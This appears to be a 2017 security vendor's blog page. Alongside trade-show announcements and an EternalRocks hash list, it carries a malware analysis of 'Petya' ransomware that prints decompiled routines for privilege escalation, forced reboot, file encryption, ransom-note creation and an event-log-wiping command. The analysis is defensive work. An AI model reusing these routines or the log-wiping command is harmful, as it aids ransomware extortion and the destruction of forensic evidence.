Trustlook to Demonstrate Enhanced Ransomware Security at Black Hat

Trustlook, the leading provider of cyber security solutions powered by artificial intelligence, will demonstrate its ransomware detection technology at Black Hat between July 26-27, 2017 at the Mandalay Bay Convention Center in Las Vegas. Ransomware has been identified as the biggest cyber threat of 2017 by the U.S. Department of Justice, and is expected to cost businesses and individuals millions in the coming years.

Trustlook’s ransomware detection rates are consistently over 99%, with extremely low false positives. The company’s proprietary AI engine learns and adapts in order to block new ransomware threats before files and data are encrypted. It processes dozens of files per second, without weighing down the network.

“Our goal is to stop ransomware before it becomes a problem,” said Allan Zhang, co-founder and CEO of Trustlook. “If files and data become encrypted, it’s usually too late to do anything.”

Trustlook’s ransomware detection is built into its SECUREai Core platform. SECUREai Core provides an additional layer of protection for network appliance makers and cloud service providers. Using industry-leading, artificial-intelligence powered scanning of traffic, files, and applications, Trustlook SECUREai Core protects against viruses, trojans, and spyware, in addition to ransomware. Threats are blocked in real-time, eliminating the cost and disruption associated with tackling threats after they’ve already penetrated the network.

“Artificial intelligence is a game changer for cyber security,” said Zhang. “It is nearly impossible for human researchers today to keep up with the rapidly changing threat landscape. Machine learning is the great equalizer to help the good guys stay ahead and take control.”

To see a demo of Trustlook’s ransomware solution, or to learn more about the company’s security solutions for mobile devices and the IoT, please visit booth IC51 on the second floor at Black Hat.

Thank you for visiting us at IoT Expo Las Vegas

Trustlook would like to express thanks to everyone who visited our booth at this week’s IoT Expo Conference at Caesar’s Palace in Las Vegas. It was a terrific show, and we were thrilled to be able to showcase the IoT security solution that the engineering team at Trustlook has been developing for over a year.

Our robot arm demonstration received a lot of interest and attention at the show. The purpose of the demo was to illustrate how our host-based security solution, SECUREai IoT, can protect industrial IoT devices such as robots or other factory floor equipment.

If you are interested in learning more about our IoT Security solution, please contact us at bd@trustlook.com.

20170719_124055

 

Trustlook to Exhibit at Black Hat 2017 in Las Vegas

Trustlook is excited to once again be exhibiting at the Black Hat cybersecurity show at the Mandalay Bay Convention Center in Las Vegas from July 26-27, 2017. We are looking forward to showcasing our latest SECUREai artificial intelligence security products. Please stop by Trustlook’s booth in Innovation City on the second floor to see a demonstration of our ransomware solution, as well as learn more about our network security, mobile, and IoT security solutions.

Trustlook SECUREai revolutionizes cybersecurity with a suite of embeddable engines built on artificial intelligence technology that prevent and detect even the most difficult malware, across multiple platforms. Technology companies select Trustlook SECUREai for its high performance, customization capability, and ease of integration.

Below is a picture of Trustlook at Black Hat 2016.

image4

 

“Petya” ransomware inspired by “WannaCry” hits European countries

Trustlook Labs has identified a new massive ransomware attack named “Petya”. The attack first struck organizations in Ukraine and knocked government, banks, power utilities and other public service agencies offline. It rapidly spreads to other countries. The malware exploits the same vulnerability identified as CVE-2017-0145 (Windows SMB Remote Code Execution vulnerability) used by “WannaCry” to spread. The malware uses the publicly available “Eternal Blue” exploit released by the hacker group The Shadow Brokers.

The vulnerability exists in unpatched versions of newer Windows operating system, as well as unsupported versions of Windows XP, 2003 and 8.

The malware’s primary purpose is to encrypt a user’s presumably important files, and then demand a ransom for decrypting those files. The major functionality was implemented in a Windows DLL module file. It is assumed the malicious module will be loaded after the exploitation on the target system. The module only exports one unnamed function, which IDA likely calls perfc_1.

The function perfc_1 accepts 4 parameters. The third parameter is an argument string which is parsed as command line arguments. Also, the first argument will be taken as a timeout value for multiple tasks in the following operation.

Upon execution, the malware will try to apply for administrative privileges “SeShutdownPrivileg”, “SeDebugPrivilege” and “SeTcbPrivilege” by using the AdjustTokenPrivileges function. If “SeDebugPrivilege” is granted successfully, the malware will write arbitrary code into the Master Boot Record (MBR). A fake CHKDSK program will then be shown when the system is rebooting.


    if ( AdjustTokenPriv(L"SeShutdownPrivilege") )
      flag = 1;
    if ( AdjustTokenPriv(L"SeDebugPrivilege") )
      flag |= 2u;
    if ( AdjustTokenPriv(L"SeTcbPrivilege") )
      flag |= 4u;
    Privilege_flag = flag;

Then the malware attempts to set a scheduled task to reboot the system within 10 -60 minutes. An example task can be seen as follows:

The following code demonstrates the behavior:

int schedule_reboot()
{
...

  v0 = 0;
  GetLocalTime(&SystemTime);
  v1 = waitingTime();
  if ( v1 < 0xA )
    v1 = 10;
  v2 = (v1 + 3) % 0x3C + SystemTime.wMinute;
  v3 = ((v1 + 3) / 0x3C + SystemTime.wHour) % 0x18;
  if ( GetSystemDirectoryW(&Buffer, 0x30Cu) && PathAppendW(&Buffer, L"shutdown.exe /r /f") )
  {
    if ( sub_10008494() )
    {
      v4 = L"/RU \"SYSTEM\" ";
      if ( !(dword_1001F144 & 4) )
        v4 = (const wchar_t *)&unk_10014388;
      wsprintfW(&v6, L"schtasks %ws/Create /SC once /TN \"\" /TR \"%ws\" /ST %02d:%02d", v4, &Buffer, v3, v2);
    }
    else
    {
      wsprintfW(&v6, L"at %02d:%02d %ws", v3, v2, &Buffer);
    }
    v7 = 0;
   v0 = shellExecute((int)&v6, 0);
  }
  return v0;
}

After setting up the scheduled task to reboot the system, the malware starts encrypting the files with the specific extensions in the system. It uses the Microsoft Cryptography API to generate key pairs and uses it to encrypt files:


// Generate encryption key
  v1 = (HCRYPTKEY *)(a1 + 20);
  v5 = CryptGenKey(*(_DWORD *)(a1 + 8), 0x660Eu, 1u, (HCRYPTKEY *)(a1 + 20));
  if ( v5 )
  {
    v2 = *v1;
    *(_DWORD *)pbData = 1;
    CryptSetKeyParam(v2, 4u, pbData, 0);
    v3 = *v1;
    *(_DWORD *)v6 = 1;
    CryptSetKeyParam(v3, 3u, v6, 0);
  }
  return v5;

The malware then imports an RSA public key from a hard-coded string.


// Import public key
      if ( CryptStringToBinaryW(
             L"MIIBCgKCAQEAxP/VqKc0yLe9JhVqFMQGwUITO6WpXWnKSNQAYT0O65Cr8PjIQInTeHkXEjfO2n2JmURWV/uHB0ZrlQ/wcYJBwLhQ9EqJ3iD"
"qmN19Oo7NtyEUmbYmopcq+YLIBZzQ2ZTK0A2DtX4GRKxEEFLCy7vP12EYOPXknVy/+mf0JFWixz29QiTf5oLu15wVLONCuEibGaNNpgq+C"
"XsPwfITDbDDmdrRIiUEUw6o3pt5pNOskfOJbMan2TZu6zfhzuts7KafP5UA8/0Hmf5K3/F9Mf9SE68EZjK+cIiFlKeWndP0XfRCYXI9AJY"
"CeaOu7CXF6U0AVNnNjvLeOn42LHFUK4o6JwIDAQAB",
             0,
             1u,
             (BYTE *)v2,
             &pcbBinary,
             0,
             0) )
      {
        pcbStructInfo = 0;
        if ( CryptDecodeObjectEx(0x10001u, (LPCSTR)0x13, v2, pcbBinary, 0, 0, 0, &pcbStructInfo) )
        {
          v3 = (BYTE *)LocalAlloc(0x40u, pcbStructInfo);
          pbData = v3;
          if ( v3 )
          {
            if ( CryptDecodeObjectEx(0x10001u, (LPCSTR)0x13, v2, pcbBinary, 0, 0, v3, &pcbStructInfo) )
              v5 = CryptImportKey(*(_DWORD *)(a1 + 8), pbData, pcbStructInfo, 0, 0, (HCRYPTKEY *)(a1 + 12));
            LocalFree(pbData);
          }

This RSA public key will be used to encrypt the encryption key that was generated earlier. Then the encrypted key will be exported into the ransom note. The infected user will be asked to send the exported key to the attacker to have the files decrypted.


// Export encrypted encryption key 
  if ( CryptExportKey(v3, v2, 1u, 0, 0, &pdwDataLen) )
  {
    v4 = (BYTE *)LocalAlloc(0x40u, pdwDataLen);
    pbBinary = v4;
    if ( v4 )
    {
      if ( CryptExportKey(*(_DWORD *)(v1 + 20), *(_DWORD *)(v1 + 12), 1u, 0, v4, &pdwDataLen) )
      {
        pcchString = 0;
        if ( CryptBinaryToStringW(pbBinary, pdwDataLen, 1u, 0, &pcchString) )
        {
          v5 = LocalAlloc(0x40u, 2 * pcchString);
          if ( v5 )
          {
            if ( CryptBinaryToStringW(pbBinary, pdwDataLen, 1u, (LPWSTR)v5, &pcchString) )
              v7 = v5;
            else
              LocalFree(v5);
          }
        }
      }
      LocalFree(pbBinary);
    }
  }
  return v7;
}

After exporting the encryption key the malware will start the real file encryption. It will collect all fixed logical drives on the system and search for files with the following hard-coded file extensions:

.3ds, .7z, .accdb, .ai, .asp, .aspx, .avhd, .back, .bak, .c, .cfg, .conf, .cpp, .cs, .ctl, .dbf, .disk, .djvu, .doc, .docx, .dwg, .eml, .fdb, .gz, .h, .hdd, .kdbx, .mail, .mdb, .msg, .nrg, .ora, .ost, .ova, .ovf, .pdf, .php, .pmf, .ppt, .pptx, .pst, .pvi, .py, .pyc, .rar, .rtf, .sln, .sql, .tar, .vbox, .vbs, .vcb, .vdi, .vfd, .vmc, .vmdk, .vmsd, .vmx, .vsdx, .vsv, .work, .xls, .xlsx, .xvd, .zip,

It skips the “C:\Windows” folder and searches for the files with aforementioned file extensions on the system and encrypts them:


void __stdcall sub_10001973(LPCWSTR pszDir, int a2, int a3)
{
  void *v3; // eax@4
  DWORD v4; // eax@5
  struct _WIN32_FIND_DATAW *v5; // eax@14
  HANDLE hFindFile; // [sp+Ch] [bp-86Ch]@3
  struct _WIN32_FIND_DATAW FindFileData; // [sp+10h] [bp-868h]@3
  WCHAR FileName; // [sp+260h] [bp-618h]@9
  WCHAR pszDest; // [sp+468h] [bp-410h]@2
  WCHAR v10; // [sp+670h] [bp-208h]@15

  if ( a2 )
  {
    if ( PathCombineW(&pszDest, pszDir, L"*") )
    {
      hFindFile = FindFirstFileW(&pszDest, &FindFileData);
      if ( hFindFile != (HANDLE)-1 )
      {
   […]
          if ( wcscmp(FindFileData.cFileName, L".")
            && wcscmp(FindFileData.cFileName, L"..")
            && PathCombineW(&FileName, pszDir, FindFileData.cFileName) )
          {
            if ( !(FindFileData.dwFileAttributes & 0x10) || FindFileData.dwFileAttributes & 0x400 )
            {
              v5 = (struct _WIN32_FIND_DATAW *)PathFindExtensionW(FindFileData.cFileName);
              if ( (WCHAR *)v5 != &FindFileData.cFileName[wcslen(FindFileData.cFileName)] )
              {
                wsprintfW(&v10, L"%ws.", v5);
                if ( StrStrIW(
                       L".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs….",
                       &v10) )
                {
                  sub_1000189A(&FileName, a3);
                }
              }
            }
            else if ( !StrStrIW(L"C:\\Windows;", &FileName) )
            {
              sub_10001973(&FileName, a2 - 1, a3);
            }
          }
        }
        while ( FindNextFileW(hFindFile, &FindFileData) );
        FindClose(hFindFile);
      }
    }
  }
}

After encrypting all the files, the malware drops a ransom note in README.TXT file.

The following code shows the operation to construct the ransom note:


      if ( PathCombineW(&pszDest, pszDir, L"README.TXT") )
      {
        v2 = waitingTime();
        if ( v2 )
          Sleep(60000 * (v2 - 1));
        v3 = CreateFileW(&pszDest, 0x40000000u, 0, 0, 2u, 0, 0);
        if ( v3 != (HANDLE)-1 )
        {
          NumberOfBytesWritten = 0;
          WriteFile(
            v3,
            L"Ooops, your important files are encrypted.\r\n"
             "\r\n"
             "If you see this text, then your files are no longer accessible, because\r\n"
             "they have been encrypted. Perhaps you are busy looking for a way to recover\r\n"
             "your files, but don't waste your time. Nobody can recover your files without\r\n"
             "our decryption service.\r\n"
             "\r\n"
             "We guarantee that you can recover all your files safely and easily.\r\n"
             "All you need to do is submit the payment and purchase the decryption key.\r\n"
             "\r\n"
             "Please follow the instructions:\r\n"
             "\r\n"
             "1.\tSend $300 worth of Bitcoin to following address:\r\n"
             "\r\n",
            0x432u,
            &NumberOfBytesWritten,
            0);
          WriteFile(v3, L"1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX\r\n\r\n", 0x4Cu, &NumberOfBytesWritten, 0);
          WriteFile(
            v3,
            L"2.\tSend your Bitcoin wallet ID and personal installation key to e-mail ",
            0x8Eu,
            &NumberOfBytesWritten,
            0);
          WriteFile(v3, L"wowsmith123456@posteo.net.\r\n", 0x38u, &NumberOfBytesWritten, 0);
          WriteFile(v3, L"\tYour personal installation key:\r\n\r\n", 0x48u, &NumberOfBytesWritten, 0);
          WriteFile(v3, exported_key, 2 * wcslen((const unsigned __int16 *)exported_key),     &NumberOfBytesWritten, 0);
          CloseHandle(v3);
        }
      }

From the above code, we can see that the exported key (encrypted by the attacker’s RSA public key) will be written in the section “Your personal installation key:” in the ransom note. The attacker will ask the victim to send the exported key by email. Also $300 worth of Bitcoin is demanded to decrypt the files.

At last the malware will erase its trace by executing following command:

"wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn"

When the time is up, the scheduled task will reboot the system. The malicious code written into the MBR section will fake a CHKDSK progress to hide its encryption of MFT:

After the operation is done, the ransom note will be shown to the infected user:

At the time of this posting, the Petya ransomware author has received 3.99 BTC in the account:

However, after testing on the target email, it seems the service provider has revoked the attacker’s account. Therefore, even if the infected users paid the ransom, the attacker has no way to get the encryption key and the files will not be decrypted.


The response from the remote server was:
554 5.7.1 <wowsmith123456@posteo.net>: Recipient address rejected: Access denied

Sample information:

MD5 71b6a493388e7d0b40c83ce903bc6b04
SHA-1 34f917aaba5684fbe56d3c57d48ef2a1aa7cf06d
SHA-256 027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745

Trustlook to exhibit at IoT Evolution Expo in Las Vegas

Trustlook is excited to be exhibiting at IoT Evolution Expo in Las Vegas from July 17-20, 2017. Please stop by booth #420 in the Caesar’s Palace Ballroom to see a demonstration of Trustlook’s unique IoT security solution.

Trustlook SECUREai IoT revolutionizes IoT security with a custom, embeddable engine built on artificial intelligence. SECUREai IoT is a device-behavior-based solution that detects threats that existing perimeter and network-based products fail to stop. Now smart cars, thermostats, critical industrial sensors, and millions of other connected devices can be built with security on the inside, and take advantage of Trustlook’s powerful artificial intelligence technology.

2017-05-17 11.48.30

Trustlook CEO Allan Zhang Interviewed by vpnMentor

Allan-Zhang-768x403Allan Zhang, co-founder and CEO of Trustlook, was recently interviewed by vpnMentor. Allan answers the following questions:

  • Please provide some background on Trustlook.
  • How can AI be used to enhance cybersecurity?
  • In your opinion, what’s led us to the WannaCry attack. Could it have been predicted?
  • What can you tell us about your solution to the Wannacry attack?
  • Who is your typical client?

You can read the entire interview here. We’d like to thank Ditsa Keren and her team at vpnMentor for their help putting together this interview.

Trustlook Has Identified 26 EternalRocks Samples

Trustlook has collected 26 samples from the EternalRocks attack – an attack that comes on the heels of the devastating WannaCry Ransomware attack from last week. The hash for each of the 26 samples is listed below.

EternalRocks uses seven exploits first discovered by the National Security Agency and leaked in April by the Shadow Brokers group. They include EternalBlue, DoublePulsar, EternalChampion, EternalRomance, EternalSynergy, ArchiTouch and SMBTouch. For reference, WannaCry used only two vulnerabilities, leading some to believe that EternalRocks could pose a bigger problem than WannaCry.

It is unclear what EternalRocks will do to the computers it has infected. For now, it remains dormant as it continues to spread and infect more computers. But it can be weaponized at anytime and strike suddenly.

Users should make it a habit to patch their systems regularly and often. The single best thing you can do to protect your networks against malware attacks, worms and ransomware is to patch the known vulnerabilities.

Stay tuned to Trustlook’s blog for further updates on EternalRocks…

1ee894c0b91f3b2f836288c22ebeab44798f222f17c255f557af2260b8c6a32d
20240431d6eb6816453651b58b37f53950fcc3f0929813806525c5fd97cdc0e1
2094d105ec70aa98866a83b38a22614cff906b2cf0a08970ed59887383ee7b70
23eeb35780faf868a7b17b8e8da364d71bae0e46c1ababddddddecbdbd2c2c64
44472436a5b46d19cb34fa0e74924e4efc80dfa2ed491773a2852b03853221a2
589af04a85dc66ec6b94123142a17cf194decd61f5d79e76183db026010e0d31
64442cceb7d618e70c62d461cfaafdb8e653b8d98ac4765a6b3d8fd1ea3bce15
6bc73659a9f251eef5c4e4e4aa7c05ff95b3df58cde829686ceee8bd845f3442
70ec0e2b6f9ff88b54618a5f7fbd55b383cf62f8e7c3795c25e2f613bfddf45d
7b8674c8f0f7c0963f2c04c35ae880e87d4c8ed836fc651e8c976197468bd98a
94189147ba9749fd0f184fe94b345b7385348361480360a59f12adf477f61c97
9bd32162e0a50f8661fd19e3b26ff65868ab5ea636916bd54c244b0148bd9c1b
a77c61e86bc69fdc909560bb7a0fa1dd61ee6c86afceb9ea17462a97e7114ab0
a7c387b4929f51e38706d8b0f8641e032253b07bc2869a450dfa3df5663d7392
ad8965e531424cb34120bf0c1b4b98d4ab769bed534d9a36583364e9572332fa
aedd0c47daa35f291e670e3feadaed11d9b8fe12c05982f16c909a57bf39ca35
b2ca4093b2e0271cb7a3230118843fccc094e0160a0968994ed9f10c8702d867
c4762489488f797b4b33382c8b1b71c94a42c846f1f28e0e118c83fe032848f0
c999bf5da5ea3960408d3cba154f965d3436b497ac9d4959b412bfcd956c8491
cf8533849ee5e82023ad7adbdbd6543cb6db596c53048b1a0c00b3643a72db30
d43c10a2c983049d4a32487ab1e8fe7727646052228554e0112f6651f4833d2c
d86af736644e20e62807f03c49f4d0ad7de9cbd0723049f34ec79f8c7308fdd5
e049d8f69ddee0c2d360c27b98fa9e61b7202bb0d3884dd3ca63f8aa288422dc
e77306d2e3d656fa04856f658885803243aef204760889ca2c09fbe9ba36581d
f152ed03e4383592ce7dd548c34f73da53fc457ce8f26d165155a331cde643a9
fc75410aa8f76154f5ae8fe035b9a13c76f6e132077346101a0d673ed9f3a0dd